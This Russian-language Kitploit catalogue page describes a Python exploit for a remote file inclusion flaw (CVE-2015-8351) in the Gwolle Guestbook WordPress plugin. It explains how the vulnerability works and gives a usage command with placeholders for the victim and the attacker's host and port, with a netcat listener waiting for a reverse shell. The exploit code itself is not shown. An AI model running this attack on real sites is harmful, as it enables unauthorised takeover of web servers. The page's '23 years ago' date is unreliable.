Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

WordPress плагин Gwolle Guestbook 1.5.3 - Удаленное включение файла

Репозиторий
23 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт RFI для плагина Gwolle Guestbook WordPress

Этот скрипт на Python эксплуатирует критическую уязвимость Remote File Inclusion (RFI) в плагине Gwolle Guestbook для WordPress, которая позволяет неаутентифицированному злоумышленнику включить удалённый PHP-файл и выполнить произвольный код на уязвимой системе.

Детали уязвимости

HTTP GET-параметр "abspath" недостаточно очищается перед использованием в PHP-функции require(). Удалённый злоумышленник может включить файл с именем 'wp-load.php' с произвольного удалённого сервера и выполнить его содержимое на уязвимом веб-сервере. Для этого злоумышленнику необходимо разместить вредоносный файл 'wp-load.php' в корневом каталоге своего сервера и включить URL сервера в запрос.

Успешная эксплуатация этой уязвимости может привести к компрометации всей установки WordPress и даже к компрометации всего веб-сервера.

Использование

Скрипт требует три аргумента:

  • Целевой URL: URL уязвимой установки WordPress.
  • Хост атакующего: IP-адрес или имя хоста машины атакующего.
  • Порт атакующего: номер порта, на котором атакующий ожидает обратную оболочку.

Пример:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

Примечание: У вас должен быть открыт netcat listener на машине атакующего на указанном порту.

Отказ от ответственности

Этот скрипт предоставлен только в образовательных целях. Автор не несёт ответственности за любой ущерб, причинённый неправильным использованием этого скрипта.

Скачать инструмент